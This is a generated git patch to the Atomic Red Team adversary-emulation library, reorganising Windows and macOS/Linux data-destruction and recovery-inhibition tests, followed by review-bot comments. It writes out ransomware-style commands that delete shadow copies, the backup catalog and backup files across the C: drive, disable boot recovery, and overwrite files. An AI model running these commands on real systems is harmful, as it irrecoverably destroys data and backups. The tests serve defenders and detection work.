From c4cd523a8dd1ddde4b78c06a968a08ba74fda7c3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 1 Apr 2020 00:05:53 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1485/T1485.md | 143 ++++++--------------------------------- atomics/T1490/T1490.md | 32 +++++++++ atomics/index.md | 9 +-- atomics/index.yaml | 95 +++++++++----------------- atomics/linux-index.md | 2 +- atomics/macos-index.md | 2 +- atomics/windows-index.md | 7 +- 7 files changed, 91 insertions(+), 199 deletions(-) diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 66d0d18b..f7b2f8b7 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a ## Atomic Tests -- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies) +- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete) -- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog) - -- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair) - -- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete) - -- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd) - -- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies -Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -vssadmin.exe delete shadows /all /quiet -``` - - - - - - -
-
- -## Atomic Test #2 - Windows - Delete Windows Backup Catalog -Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -wbadmin.exe delete catalog -quiet -``` - - - - - - -
-
- -## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair -Disables repair by the Windows Recovery Console on boot. -This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures -bcdedit.exe /set {default} recoveryenabled no -``` - -#### Cleanup Commands: -```cmd -bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures -bcdedit.exe /set {default} recoveryenabled yes -``` - - - - - -
-
- -## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete -Overwrites and deletes a file using Sysinternals SDelete. -Requires the download of either Sysinternals Suite or the individual SDelete utility. +## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete +Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in +the powershell session along with other information about the file that was deleted. **Supported Platforms:** Windows @@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe| +| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe| +| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt| #### Attack Commands: Run with `powershell`! ```powershell -New-Item $env:TEMP\T1485.txt -#{sdelete_exe} -accepteula $env:TEMP\T1485.txt +Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" ``` 
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt ##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{sdelete_exe}) {0} else {1} +if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force -New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null -Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force +Remove-Item $env:TEMP\SDelete.zip -Force +``` +##### Description: The file to delete must exist at #{file_to_delete} +##### Check Prereq Commands: +```powershell +if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +New-Item #{file_to_delete} -Force | Out-Null ``` @@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force

-## Atomic Test #5 - macOS/Linux - Overwrite file with DD +## Atomic Test #2 - macOS/Linux - Overwrite file with DD Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. @@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source} -
-
- -## Atomic Test #6 - Windows - Delete Backup Files -Deletes backup files in a manner similar to Ryuk ransomware. - -**Supported Platforms:** Windows - - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 -``` - - - - - -
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 1cf97717..d0bf8477 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or - [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell) +- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no ``` +#### Cleanup Commands: +```cmd +bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures +bcdedit.exe /set {default} recoveryenabled yes +``` @@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} +
+
+ +## Atomic Test #6 - Windows - Delete Backup Files +Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try +to delete files from around the system. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk +``` + + + + + +
diff --git a/atomics/index.md b/atomics/index.md index 41e1d47b..ddddc195 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -493,12 +493,8 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -511,6 +507,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux] diff --git a/atomics/index.yaml b/atomics/index.yaml index 59b3f4a8..88e41b50 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -15971,73 +15971,39 @@ impact: modified: '2019-07-19T14:34:28.595Z' identifier: T1485 atomic_tests: - - name: Windows - Delete Volume Shadow Copies - description: 'Deletes Windows Volume Shadow Copies. This technique is used by - numerous ransomware families and APT malware such as Olympic Destroyer. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'vssadmin.exe delete shadows /all /quiet - -' - - name: Windows - Delete Windows Backup Catalog - description: 'Deletes Windows Backup Catalog. This technique is used by numerous - ransomware families and APT malware such as Olympic Destroyer. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'wbadmin.exe delete catalog -quiet - -' - - name: Windows - Disable Windows Recovery Console Repair - description: | - Disables repair by the Windows Recovery Console on boot. - This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures - bcdedit.exe /set {default} recoveryenabled no - cleanup_command: | - bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures - bcdedit.exe /set {default} recoveryenabled yes - name: Windows - Overwrite file with Sysinternals SDelete description: | - Overwrites and deletes a file using Sysinternals SDelete. - Requires the download of either Sysinternals Suite or the individual SDelete utility. + Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in + the powershell session along with other information about the file that was deleted. 
supported_platforms: - windows input_arguments: sdelete_exe: description: Path of sdelete executable type: Path - default: PathToAtomicsFolder\T1485\bin\sdelete.exe + default: "$env:TEMP\\Sdelete\\sdelete.exe" + file_to_delete: + description: Path of file to delete + type: path + default: "$env:TEMP\\T1485.txt" dependency_executor_name: powershell dependencies: - description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}' + prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}' get_prereq_command: |- Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force - New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null - Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force + Remove-Item $env:TEMP\SDelete.zip -Force + - description: 'The file to delete must exist at #{file_to_delete}' + prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 + }' + get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null' executor: name: powershell - command: | - New-Item $env:TEMP\T1485.txt - #{sdelete_exe} -accepteula $env:TEMP\T1485.txt + command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}" + +' - name: macOS/Linux - Overwrite file with DD description: | Overwrites and deletes a file using DD. 
@@ -16058,19 +16024,6 @@ impact: name: bash command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} -' - - name: Windows - Delete Backup Files - description: 'Deletes backup files in a manner similar to Ryuk ransomware. - -' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* - c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 - ' '': technique: @@ -16250,6 +16203,9 @@ impact: command: | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no + cleanup_command: | + bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures + bcdedit.exe /set {default} recoveryenabled yes - name: Windows - Delete Volume Shadow Copies via WMI with PowerShell description: | Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. @@ -16263,6 +16219,19 @@ impact: elevation_required: true command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} +' + - name: Windows - Delete Backup Files + description: | + Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try + to delete files from around the system. + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* + c:\backup*.* c:\*.set c:\*.win c:\*.dsk + ' T1496: technique: diff --git a/atomics/linux-index.md b/atomics/linux-index.md index b698d0ab..d900a71f 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md 
@@ -39,7 +39,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 4f6557a3..5cf8dce9 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -56,7 +56,7 @@ # impact - [T1531 Account Access Removal](./T1531/T1531.md) - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos] + - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 15cdc6f1..c64363d7 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
@@ -356,11 +356,7 @@ - Atomic Test #1: Change User Password - Windows [windows] - Atomic Test #2: Delete User - Windows [windows] - [T1485 Data Destruction](./T1485/T1485.md) - - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows] - - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows] - - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows] - - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] - T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -373,6 +369,7 @@ - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] + - Atomic Test #6: Windows - Delete Backup Files [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1496 Resource Hijacking](./T1496/T1496.md) - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
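Review bot: In the first T1485.md hunk (`@@ -8,103 +8,16 @@`), renumbering the surviving tests from #4/#5 to #1/#2 changes their heading anchors (`#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete` becomes `#atomic-test-1---...`), so any external link or runner reference to the old anchors or test numbers silently breaks; the three removed tests (Delete Volume Shadow Copies, Delete Windows Backup Catalog, Disable Windows Recovery Console Repair) already exist under T1490 as tests #2 to #4, which is visible in the index.md context, so it would help readers if the T1485 page said that these tests now live in T1490 rather than just dropping them.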
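Review bot: In the `@@ -114,15 +27,15 @@` hunk, `Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` evaluates a string assembled from the two inputs, and because the default `$env:TEMP` expands to a path such as `C:\Users\<name>\AppData\Local\Temp`, any user name containing a space makes the expanded command split at the space and fail. The call operator with quoted arguments, `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"`, still expands `$env:TEMP` inside the double quotes, handles spaces, and avoids evaluating input text as code. The same hunk also declares `sdelete_exe` with type `Path` and `file_to_delete` with type `path`; the casing should be consistent.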
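Review bot: In the `@@ -132,14 +45,22 @@` hunk, dropping `New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null` and `Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force` means the get-prereq step now only ever extracts to `$env:TEMP\Sdelete`; if a user overrides `sdelete_exe` to any other location, the check `if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}` will still fail after the get-prereq runs. Either keep the copy step or document that `sdelete_exe` must match the extraction path. Since this step downloads and later executes a binary, it would also be worth checking the Authenticode signature of the extracted `sdelete.exe` (for example `(Get-AuthenticodeSignature "$env:TEMP\Sdelete\sdelete.exe").Status -eq 'Valid'`) before the prereq is considered satisfied. The change from `{0} else {1}` to `{exit 0} else {exit 1}` is a correct fix, as the old form only wrote a value to the pipeline and never set an exit code. Finally, the new `New-Item #{file_to_delete} -Force | Out-Null` prereq only creates an empty file when one is missing; if `file_to_delete` is pointed at an existing file the test wipes it irrecoverably, and the description should say so.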
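Review bot: In the T1490.md hunk `@@ -133,6 +135,11 @@`, the added cleanup hard-codes `bootstatuspolicy DisplayAllFailures` and `recoveryenabled yes`, which are the Windows defaults rather than whatever the host had before the test; on a system where an administrator had deliberately set a different boot status policy, cleanup silently replaces it. Consider capturing the pre-test values with `bcdedit /enum {default}` before the attack commands, or at least noting in the description that cleanup restores defaults, not prior state.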
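Review bot: In the T1490.md hunk `@@ -165,4 +172,29 @@`, the new description has a typo, "Upon exection" should read "Upon execution". More importantly, `del /s /f /q c:\*.VHD c:\*.bac c:\*.bak ...` recursively deletes real backup artefacts across the entire C: drive, the test has no cleanup section, and unlike the SDelete test it exposes no input argument to confine it to a test directory; a runner that executes this with elevation on anything but a throwaway VM loses genuine data. Consider adding a `root_path` style input defaulting to a directory under `$env:TEMP` that the get-prereq populates with sample files of each extension, and stating explicitly in the description that the defaults are destructive. Note also that the `>nul 2>&1` redirection present in the T1485 version was dropped here, which is why the "access is denied" messages now appear; the description covers that, so this is fine as long as it is intentional.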
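Review bot: In the index.yaml hunk `@@ -15971,73 +15971,39 @@`, the same points as the T1485.md hunks apply (the `Invoke-Expression` command, the `Path` versus `path` type casing, and the get-prereq no longer honouring a custom `sdelete_exe`); since this file is generated by the doc job, the fixes belong in the source `atomics/T1485/T1485.yaml`, not here. The line-wrapped single-quoted scalar `prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1` followed by `}'` is valid YAML (the line break folds to a space), but it is fragile for anyone editing by hand and would be clearer as a single line.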
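Review bot: In the index.yaml hunk `@@ -16263,6 +16219,19 @@`, the "Upon exection" typo from T1490.md is reproduced in the generated `description`, so the fix needs to go into `atomics/T1490/T1490.yaml` to survive the next generator run; the same applies to any cleanup or input argument added for the `del /s /f /q` test.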